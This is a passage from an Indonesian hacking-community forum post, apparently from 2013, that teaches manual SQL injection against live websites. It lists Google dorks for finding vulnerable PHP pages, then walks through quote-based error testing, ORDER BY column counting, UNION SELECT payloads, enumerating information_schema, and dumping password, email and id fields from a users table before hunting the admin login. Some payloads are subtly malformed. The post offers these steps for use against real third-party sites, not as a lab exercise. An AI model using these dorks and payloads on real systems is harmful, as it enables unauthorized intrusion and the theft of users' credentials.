Pontianak Cyber Crime Community
KALI INI FORUM PC3 PINDAH KE : http://badsystem.us.to/index.php

Kali ini link yang admin bagikan sudah pasti, tidak akan ada pergantian domain lagi.

Terima Kasih

Pontianak Cyber Crime Community

Welcome to your Forum Pontianak Cyber Crime Community
 
IndeksPortalCalendarPencarianPendaftaranLogin
Pencarian
 
 

Display results as :
 
Rechercher Advanced Search
Keywords
jail hacker Belajar mengetahui cheat notepad buat facebook buku auto headshot april hack Hacking admin offline download point DDos blank sakti smart billing orang 2014 lain
Latest topics
December 2016
MonTueWedThuFriSatSun
   1234
567891011
12131415161718
19202122232425
262728293031 
CalendarCalendar
Fans Page
Music by Anonymous
Free Music Sites
Free Music Online

Free Music at Anonymous

Share | 
 

 SQL By HaCK3r

Topik sebelumnya Topik selanjutnya Go down 
PengirimMessage
Admin
™-----Administrator-----™
™-----Administrator-----™


Jumlah posting : 50
Points : 141281
Join date : 27.01.13
Age : 18
Lokasi : Pontianak

PostSubyek: SQL By HaCK3r   Wed Jan 30, 2013 8:46 am

DORK : Klik SPOILER
Spoiler:
inurl:review.php?id=
inurl:iniziativa.php?in=
inurl:curriculum.php?id=
inurl:labels.php?id=
inurl:story.php?id=
inurl:look.php?ID=
inurl:newsone.php?id=
inurl:aboutbook.php?id=
inurl:material.php?id=
inurl:opinions.php?id=
inurl:announce.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:tekst.php?idt=
inurl:newscat.php?id=
inurl:newsticker_info.php?idn=
inurl:rubrika.php?idr=
inurl:rubp.php?idr=
inurl:offer.php?idf=
inurl:art.php?idm=
inurl:title.php?id=



CARA:

1.misal ketemu http://www.xxx.com/index.php?id=1
maka tambahkan ' di akhir kalimat sehingga menjadi http://www.xxx.com/index.php?id=1'
harus ada pesan/tulisan eror kalau tdk ada cari yg lain

2.mencari jumlah table dengan cara memakai order by contoh
http://www.xxx.com/index.php?id=-1 order by 1--
itu pakai spasi

jika
http://www.xxx.com/index.php?id=-1 order by 1-- tidak ada pesan eror sperti cara 1 maka tambah 1 pada angka terakhir misal
http://www.xxx.com/index.php?id=-1 order by 1-- di rubah jadi
http://www.xxx.com/index.php?id=-1 order by 2--
BEGITU TERUS SAMPAI SETERUSNYA SAMPAI ADA PESAN/TULISAN EROR
KALAU SUDAH KETEMU PADA EROR PERTAMA MISAL
http://www.xxx.com/index.php?id=-1 ORDER BY 9-- (EROR PERTAMA) maka jumlah table ada 8

3.kita sudah menemukan jumlah table yaitu 8 setelah itu kita memakai cara union select

misal http://www.xxx.com/index.php?id=1 di rubah menjadi http://www.xxx.com/index.php?id=-1 union select 1,2,3,4,5,6,7,8--
setelah itu maka akan muncul beberapa angka dan 1 angka ada yg pling besar(SIZE nya).jika huruf paling besar adalah 3 maka:

http://www.xxx.com/index.php?id=-1 union select 1,2,3,4,5,6,7,8-- di rubah menjadi http://www.xxx.com/index.php?id=-1 1,2,3,@@version,5,6,7,8--
maka akan muncul versi SQL nya,jika versinya 5 kita lanjut kalau versinya 4 harus pakai sql blind.
ini untuk versi 5:

http://www.xxx.com/index.php?id=-1 union select 1,2,3,group_concat(table_name),7,8 information_schema.tables where table_schema=database()

maka akan kluar beberapa tulisan.cari kata kata yg berhubungan dengan admin misalnya ada tulisan "admin" atau "users"
misal hanya ada tulisan "users"
maka buka http://www.swingnote.com/tools/texttohex.php lalu kita convert to hex yaitu kata "users" tdi menjadi kode hex yg hasilnya 7573657273

kita sudah ada kode 7573657273 yg artinya adalah "users"yg kata users itu dapetnya dari http://www.xxx.com/index.php?id=-1 union select 1,2,3,group_concat(table_name),7,8 information_schema.tables where table_schema=database()

setelah itu kita ubah http://www.xxx.com/index.php?id=-1 union select 1,2,3,group_concat(table_name),7,8 information_schema.tables where table_schema=database()

- table_name = column_name = group_concat(column_name)
- tables = columns = from information_schema.columns
- table_schema=database() =? table_name=0x(tambahkan kode hex tadi) = table_name=0x7573657273

Contoh: http://www.xxx.com/index.php?id=-1 union select 1,2,3,group_concat(table_name),7,8 from information_schema.columns where table_name=0x7573657273--

4.nah lalu ada kata kata misal password,email,id dll
kita pakai yg perlu saja.

misal dari
http://www.xxx.com/index.php?id=-1 union select 1,2,3,group_concat(table_name),7,8 from information_schema.columns where table_name=0x7573657273--

kita rubah
-(table_name) menjadi tulisan yg ada di cara sblumnya misal password,email,id dll TETAPI CARA PEMISAHANYA HARUS MEMAKAI KODE ,0x3a,

misal url kita tdi http://www.xxx.com/index.php?id=-1 union select 1,2,3,group_concat(table_name),7,8 from information_schema.columns where table_name=0x7573657273--

dirubah menjadi

http://www.xxx.com/index.php?id=-1 union select 1,2,3,group_concat(password,0x3a,email,0x3a,id),7,8 from information_schema.columns where table_name=0x7573657273--

dan kode terakhir kita ubah juga.kita di ataskan kode hexnya adalah "users" maka kita ganti pada url
http://www.xxx.com/index.php?id=-1 union select 1,2,3,group_concat(password,0x3a,email,0x3a,id),7,8 from information_schema.columns where table_name=0x7573657273--

menjadi

http://www.xxx.com/index.php?id=-1 union select 1,2,3,group_concat(password,0x3a,email,0x3a,id),7,8 from users--

SELESAI DEH SEKARANG TINGGAL CARI HALAMAN LOGIN ADMINYA

CARI DI MBAH GOOGLE YAH....
Kembali Ke Atas Go down
http://pontianakc3.net.my.id
 
SQL By HaCK3r
Topik sebelumnya Topik selanjutnya Kembali Ke Atas 
Halaman 1 dari 1

Permissions in this forum:Anda tidak dapat menjawab topik
Pontianak Cyber Crime Community :: Trash Can :: Trash Can-
Navigasi: